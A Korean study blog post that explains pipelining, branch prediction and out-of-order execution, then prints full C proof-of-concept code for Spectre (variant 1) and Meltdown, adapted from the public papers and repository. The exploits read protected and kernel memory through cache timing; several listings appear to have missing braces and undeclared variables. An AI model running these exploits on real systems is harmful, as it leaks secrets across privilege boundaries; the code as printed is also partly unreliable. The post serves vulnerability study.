Spectre & Meltdown 취약점 분석

이글은 개인 공부용으로 작성한 글이며 틀린 내용이 있을 수 있습니다.

1. Spectre

Variant 1: bounds check bypass (CVE-2017-5753)

Variant 2: branch target injection (CVE-2017-5715)

이 취약점은 CPU의 Branch Prediction에 의해서 발생한 취약점이다.

Pipeline

CPU는 Instruction이 요구하는 동작을 수행하기 위해서 아래와 같은 과정을 거친다.

- Instruction Fetch

- Instruction Decode

- Instruction Execution

- Memory Access

- Register Write Back

그런데 하나의 Instruction이 처리될 때까지 다음 Instruction이 처리되지 않고 기다리고 있다면, Instruction의 특정 단계를 처리하는 동안 다른 단계를 처리하는 부분은 아무것도 하지 않는다. 그렇기 때문에 효율적으로 Instruction을 실행시키기 위해서 고안된 방법이다.

Pipeline Hazard

위에서 다룬 Pipeline 방식에도 위험이 존재하는데 크게 아래와 같다.

- Structural Hazard

- Data Hazard

- Control Hazard

이 보고서에서 중요하게 볼 부분은 Control Hazrad 이다.

Control Hazard는 분기명령 중 분기가 결정되는 시점에 이미 파이프라인에 후속 명령들이 존재하여 발생하는 위험이다. 이 위험은 분기가 True일 경우에 실행하지 말았어야 할 명령들을 실행하여 문제가 된다.

Dynamic Branch Prediction

Pipeline에서 Branch와 jmp와 같은 memory 주소를 뛰어넘는 명령을 수행할 때 자주 발생하는 Control Hazard는 다음 명령이 바뀌기 때문에 분기전에 다음 명령어들을 미리 실행시켜두는 것이 필요하지 않다. Control Hazard에 대한 가장 쉬운 해결책은 분기을 만나면 그 stage에서 멈추고 분기 명령을 수행할 때까지 기다리는 것이다. 하지만 이렇게 되면 Pipeline에 원래 목적과 맞지 않기 때문에 제안된 방법이 Branch Prediction이다.

Branch Prediction은 branch가 성립하지 않을 거라는 가정하에 다음 명령을 실행시키는 Predict-Not-Taken 방식과 반대로 branch가 무조건 성립할 거라는 가정하에 branch가 성립한 이후에 명령들을 미리 실행시키는 Predict-Taken방식이 존재한다. 또한 Static Branch Prediction은 Predict-Not-Taken과 Predict-Taken 방식을 그대로 진행하되, 만약 잘못된 명령을 실행시켰다면 해당 명령을 flush시키고 다시 돌아가는 형태로 구현되어 있다. 즉 명령의 타입에 의해 Prediction 구조가 결정되는 것이다. 하지만 이것은 Prediction이 잘못 판단되면 많은 명령이 flush 되고 다시 돌아가는 비효율적인 결과가 발생한다. 그렇기 때문에 유동적으로 Prediction 구조를 결정하는 것이 Dynamic Branch Prediction이다.

Dynamic Branch Prediction의 경우에는 Branch Prediction Buffer가 잘못 명령어를 실행하는 횟수를 체크하여 더 높은 확률의 방식을 선정한다. 즉 Runtime 내에 Predict-Not-Taken과 Predict-Taken이 변경된다.

Spectre

Spectre는 Branch Prediction으로 인하여 실행되는 명령 때문에 취약점이 발생한다. Predict-Taken 상태에서는 분기문의 다음 명령까지 실행시키는데 이때 실제로 코드상에서는 실행되지 않는 부분이 실행될 수 있고, 이로 인하여 캐시에 값이 저장되면 cache timing attack을 이용해 memory leak을 하는 취약점이다. 아래 POC에서 더 상세히 설명하겠다.

Proof of concept for the Spectre

#include <stdio.h>

#include <stdlib.h>

#include <stdint.h>

#ifdef _MSC_VER

#include <intrin.h> /* for rdtscp and clflush */

#pragma optimize("gt",on)

#else

#include <x86intrin.h> /* for rdtscp and clflush */

#endif

/********************************************************************

Victim code.

********************************************************************/

unsigned int array1_size = 16;

uint8_t unused1[64];

uint8_t array1[160] = {

1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16

};

uint8_t unused2[64];

uint8_t array2[256 * 512];

char * secret = "Youngjoo's Secret";

char * secret2= "Youngjoo's Secret2 ";

uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */

/* 아래 함수는 실제 취약점이 발생되는 부분입니다. if문이 True가 나와서 다음 명령이 정상적으로 실행될 때가 있어야 하므로 아래 처럼 함수를 만듭니다. array2[array1[x] * 512] 처럼 주소를 읽는것은 좀 더 아래에서 설명하겠습니다.*/

void victim_function(size_t x) {

if (x < array1_size) {

temp &= array2[array1[x] * 512];

}

/********************************************************************

Analysis code

********************************************************************/

#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */

/* Report best guess in value[0] and runner-up in value[1] */

void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {

static int results[256];

int tries, i, j, k, mix_i, junk = 0;

size_t training_x, x;

volatile uint8_t * addr;

for (i = 0; i < 256; i++)

results[i] = 0;

for (tries = 999; tries > 0; tries--) {

// 아래에서 배열에 관한 캐시를 초기화 해줍니다.

/* Flush array2[256*(0..255)] from cache */

for (i = 0; i < 256; i++)

_mm_clflush( & array2[i * 512]); /* intrinsic for clflush instruction */

/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */

training_x = tries % array1_size;

for (j = 29; j >= 0; j--) {

_mm_clflush( & array1_size);

for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */

/* Branch Prediction 가 Predict-Taken 방식으로 동작하도록 몇번은 조건문이 True가 되는 x를 만들어줍니다.

그리고 Predict-Taken 상태일때 읽으려는 주소를 넣는데 그 때는 조건문이 False가 되도록 합니다. 하지만 실제로는

Predict-Taken 방식이기 때문에 명령어가 실행됩니다. */

/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */

/* Avoid jumps in case those tip off the branch predictor */

x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */

x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */

x = training_x ^ (x & (malicious_x ^ training_x));

/* Call the victim! */

victim_function(x);

}

/* 아래 부분은 leak을 하는 부분입니다. 아까 위 함수에서 array2[array1[x] * 512]이런식으로 읽는것을 원하는 값에

512를 곱해서 array2에 넣어준 이유는 찾으려는 값이 0x41이라고 가정하고 값을 찾을 때 array2[ 0x41 * 512 ]가

실행되었던 적이 있어 array2[0x41 * 512]를 불러올때 가장 빠르게 불러올 것이기 때문입니다.

즉 array2[ 0x00 * 512 ] ~ array2[ 0xff * 512 ] 까지 했을때 가장 빠르게 불러온 값이 원하는 주소에 값이 됩니다.

이 과정을 통하여 원하는 주소에 있는 값을 leak 해올 수 있습니다.*/

/* Time reads. Order is lightly mixed up to prevent stride prediction */

for (i = 0; i < 256; i++) {

mix_i = ((i * 167) + 13) & 255;

addr = & array2[mix_i * 512];

time1 = __rdtscp( & junk); /* READ TIMER */

junk = * addr; /* MEMORY ACCESS TO TIME */

time2 = __rdtscp( & junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */

if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])

results[mix_i]++; /* cache hit - add +1 to score for this value */

}

/* Locate highest & second-highest results results tallies in j/k */

j = k = -1;

for (i = 0; i < 256; i++) {

if (j < 0 || results[i] >= results[j]) {

k = j;

j = i;

} else if (k < 0 || results[i] >= results[k]) {

k = i;

}

if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))

break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */

}

results[0] ^= junk; /* use junk so code above won’t get optimized out*/

value[0] = (uint8_t) j;

score[0] = results[j];

value[1] = (uint8_t) k;

score[1] = results[k];

}

int main(int argc,

const char * * argv) {

size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */

int i, score[2], len = 100;

uint8_t value[2];

for (i = 0; i < sizeof(array2); i++)

array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */

if (argc == 3) {

sscanf(argv[1], "%p", (void * * )( & malicious_x));

malicious_x -= (size_t) array1; /* Convert input value into a pointer */

sscanf(argv[2], "%d", & len);

}

printf("Reading %d bytes:\n", len);

while (--len >= 0) {

printf("Reading at malicious_x = %p... ", (void * ) malicious_x);

readMemoryByte(malicious_x++, value, score);

printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));

printf("0x%02X=’%c’ score=%d ", value[0],

(value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);

if (score[1] > 0)

printf("(second best: 0x%02X score=%d)", value[1], score[1]);

printf("\n");

}

return (0);

}

2. Meltdown

Variant 3: rogue data cache load (CVE-2017-5754)

위 취약점을 이해하기 위해서는 Out of Order Execution에 대해서 이해해야 한다.

Out of Order Execution

Out of Order Execution는 하나의 스레드 내에서 가장 많은 병렬성을 찾는 것을 목표로 한다.

A = B + C — (1)

D = A + C — (2)

G = E + F — (3)

예를 들어 위와 같은 명령을 실행해야 한다고 가정했을 때, In Order Execution에서는 G는 (1), (2)와 아무 상관이 없는데도 계속해서 기다려야 한다. 만약 (1), (2)가 매우 오래 걸린다고 가정한다면 뒤 명령어들은 계속해서 기다려야 하며 이는 성능저하로 이어진다. 그래서 최대한 병렬성을 찾아서 (1), (2)에 의존하지 않고 (3)을 처리하는 것이 Out of Order Exectuion의 핵심이다. Out of Order Execution이 실제로 어떻게 동작하는지 본다면 아래와 같다.

1. 명령어를 읽어드린다.

2. Reservation Station에 명령어를 배치한다. (리오더 버퍼에도 할당)

3. 대기열에 있는 명령어들은 피연산자가 완료되는지 지속해서 확인한다.

4. 만약 피연산자가 전부 완료되었다면 명령어는 연산장치(execution unit)에 필요한 장치를 요구한다.

5. 필요한 장치를 받으면 대기열에서 빠지고 실행된다.

6. 실행을 마치면 이 결과를 대기열에 있는 명령어들에게 알린다.

7. 리오더 버퍼에 실행이 완료된것을 체크한다. 만약 리오더 버퍼에서 가장 오래된 명령어라면 연산결과를 반영한다.

Meltdown

Meltdown은 위 Out of Order Execution을 악용한 memory leak 기법이다. memory leak 흐름은 아래와 같다.

( rcx -> 읽고자하는 커널메모리 / rbx -> 배열의 주소 )

1. reservation station에 명령어들이 전부 들어가있다.

2. mov al, byte [rcx] 가 로딩될때, 나머지 후속 명령어들이 uOPs(Micro-operation)으로 변경된다.

3. shl rax, 0xc와 mov rbx, qword [rbx + rax] 는 오퍼랜드로 rax값을 가지고 있기 때문에 rcx에서 가져온 커널값이 데이터버스에서 관찰되자마자 명령이 실행된다.

4. 그 이후에 CPU가 현재 권한수준에서 엑세스할 수 없는 주소에 엑세스 했으므로 Access Violation이 발생한다. (발생한 Access Violation은 핸들러처리)

5. shl rax, 0xc에 경우 cache timing attack을 할때 인접한 캐시에서 값을 가져오는것을 막기 위하여 4KB를 곱해준다.

6. 그리고 나서 스펙터처럼 특정 배열에 인덱스를 캐싱해온다.

7. 0x00 ~ 0xff까지 검사하면서 cache timing attack으로 leak을 하면 된다.

( jz meltdown이 존재하는 이유는 이 작업도 일정 확률로 커널메모리를 읽는것이기 때문에 만약 제대로 읽히지 않았다면 다시 처음으로 돌아가기 위해서이다. )

Proof of concept for the Meltdown

#define _GNU_SOURCE

#include <stdio.h>

#include <string.h>

#include <signal.h>

#include <ucontext.h>

#include <unistd.h>

#include <fcntl.h>

#include <ctype.h>

#include <x86intrin.h>

/* comment out if getting illegal insctructions error */

#ifndef HAVE_RDTSCP

# define HAVE_RDTSCP 1

#endif

#if !(defined(__x86_64__) || defined(__i386__))

# error "Only x86-64 and i386 are supported at the moment"

#endif

#define TARGET_OFFSET 12

#define TARGET_SIZE (1 << TARGET_OFFSET)

#define BITS_READ 8

#define VARIANTS_READ (1 << BITS_READ)

static char target_array[VARIANTS_READ * TARGET_SIZE];

void clflush_target(void)

{

int i;

for (i = 0; i < VARIANTS_READ; i++)

_mm_clflush(&target_array[i * TARGET_SIZE]);

}

extern char stopspeculate[];

static void __attribute__((noinline))

speculate(unsigned long addr)

{

// 위에서 설명한 PoC의 일부가 그대로 사용되었다.

#ifdef __x86_64__

asm volatile (

"1:\n\t"

".rept 300\n\t"

"add $0x141, %%rax\n\t"

".endr\n\t"

"movzx (%[addr]), %%eax\n\t"

"shl $12, %%rax\n\t"

"jz 1b\n\t"

"movzx (%[target], %%rax, 1), %%rbx\n"

"stopspeculate: \n\t"

"nop\n\t"

: [target] "r" (target_array),

[addr] "r" (addr)

: "rax", "rbx"

);

#else /* ifdef __x86_64__ */

asm volatile (

"1:\n\t"

".rept 300\n\t"

"add $0x141, %%eax\n\t"

".endr\n\t"

"movzx (%[addr]), %%eax\n\t"

"shl $12, %%eax\n\t"

"jz 1b\n\t"

"movzx (%[target], %%eax, 1), %%ebx\n"

"stopspeculate: \n\t"

"nop\n\t"

: [target] "r" (target_array),

[addr] "r" (addr)

: "rax", "rbx"

);

#endif

}

static inline int

get_access_time(volatile char *addr)

{

int time1, time2, junk;

volatile int j;

#if HAVE_RDTSCP

time1 = __rdtscp(&junk);

j = *addr;

time2 = __rdtscp(&junk);

#else

time1 = __rdtsc();

j = *addr;

_mm_mfence();

time2 = __rdtsc();

#endif

return time2 - time1;

}

static int cache_hit_threshold;

static int hist[VARIANTS_READ];

void check(void)

{

int i, time, mix_i;

volatile char *addr;

for (i = 0; i < VARIANTS_READ; i++) {

mix_i = ((i * 167) + 13) & 255;

addr = &target_array[mix_i * TARGET_SIZE];

time = get_access_time(addr);

if (time <= cache_hit_threshold)

hist[mix_i]++;

}

/* CPU가 일반 유저권한으로 읽을 수 없는 영역을 읽어서 발생하는 sigsegv 에러를 프로그램이 꺼지지 않도록 핸들링을 통하여 처리해주고 있다. */

void sigsegv(int sig, siginfo_t *siginfo, void *context)

{

ucontext_t *ucontext = context;

#ifdef __x86_64__

ucontext->uc_mcontext.gregs[REG_RIP] = (unsigned long)stopspeculate;

#else

ucontext->uc_mcontext.gregs[REG_EIP] = (unsigned long)stopspeculate;

#endif

return;

}

int set_signal(void)

{

struct sigaction act = {

.sa_sigaction = sigsegv,

.sa_flags = SA_SIGINFO,

};

return sigaction(SIGSEGV, &act, NULL);

}

/* 이 부분도 위에 Meltdown원리에 대해서 설명할 때 전부 설명했다. */

#define CYCLES 1000

int readbyte(int fd, unsigned long addr)

{

int i, ret = 0, max = -1, maxi = -1;

static char buf[256];

memset(hist, 0, sizeof(hist));

for (i = 0; i < CYCLES; i++) {

ret = pread(fd, buf, sizeof(buf), 0);

if (ret < 0) {

perror("pread");

break;

}

clflush_target();

speculate(addr);

check();

}

#ifdef DEBUG

for (i = 0; i < VARIANTS_READ; i++)

if (hist[i] > 0)

printf("addr %lx hist[%x] = %d\n", addr, i, hist[i]);

#endif

for (i = 1; i < VARIANTS_READ; i++) {

if (!isprint(i))

continue;

if (hist[i] && hist[i] > max) {

max = hist[i];

maxi = i;

}

return maxi;

}

static char *progname;

int usage(void)

{

printf("%s: [hexaddr] [size]\n", progname);

return 2;

}

static int mysqrt(long val)

{

int root = val / 2, prevroot = 0, i = 0;

while (prevroot != root && i++ < 100) {

prevroot = root;

root = (val / root + root) / 2;

}

return root;

}

#define ESTIMATE_CYCLES 1000000

static void

set_cache_hit_threshold(void)

{

long cached, uncached, i;

if (0) {

cache_hit_threshold = 80;

return;

}

for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++)

cached += get_access_time(target_array);

for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++)

cached += get_access_time(target_array);

for (uncached = 0, i = 0; i < ESTIMATE_CYCLES; i++) {

_mm_clflush(target_array);

uncached += get_access_time(target_array);

}

cached /= ESTIMATE_CYCLES;

uncached /= ESTIMATE_CYCLES;

cache_hit_threshold = mysqrt(cached * uncached);

printf("cached = %ld, uncached = %ld, threshold %d\n",

cached, uncached, cache_hit_threshold);

}

static int min(int a, int b)

{

return a < b ? a : b;

}

int main(int argc, char *argv[])

{

int ret, fd, i, score, is_vulnerable;

unsigned long addr, size;

static char expected[] = "%s version %s";

progname = argv[0];

if (argc < 3)

return usage();

if (sscanf(argv[1], "%lx", &addr) != 1)

return usage();

if (sscanf(argv[2], "%lx", &size) != 1)

return usage();

memset(target_array, 1, sizeof(target_array));

ret = set_signal();

set_cache_hit_threshold();

fd = open("/proc/version", O_RDONLY);

if (fd < 0) {

perror("open");

return -1;

}

for (score = 0, i = 0; i < size; i++) {

ret = readbyte(fd, addr);

if (ret == -1)

ret = 0xff;

printf("read %lx = %x %c (score=%d/%d)\n",

addr, ret, isprint(ret) ? ret : ' ',

ret != 0xff ? hist[ret] : 0,

CYCLES);

if (i < sizeof(expected) &&

ret == expected[i])

score++;

addr++;

}

close(fd);

is_vulnerable = score > min(size, sizeof(expected)) / 2;

if (is_vulnerable)

fprintf(stderr, "VULNERABLE\n");

else

fprintf(stderr, "NOT VULNERABLE\n");

exit(is_vulnerable);

}

3. 참고

https://github.com/paboldin/meltdown-exploit

https://meltdownattack.com/meltdown.pdf

https://meltdownattack.com/spectre.pdf

http://talkingaboutme.tistory.com/

저작자표시 비영리 변경금지

'해킹 > Project' 카테고리의 다른 글

CTF Module [ntpwn] (0)	2017.10.03
[1 - Wifi 모의해킹] Wifi 보안방식에(WEP,WAP등) 따른 Wifi비밀번호 해킹 (1)	2016.05.08
[0 - Wifi 모의해킹] 프로젝트 계획서 (0)	2016.04.05

NextLine의 Pwnable 블로그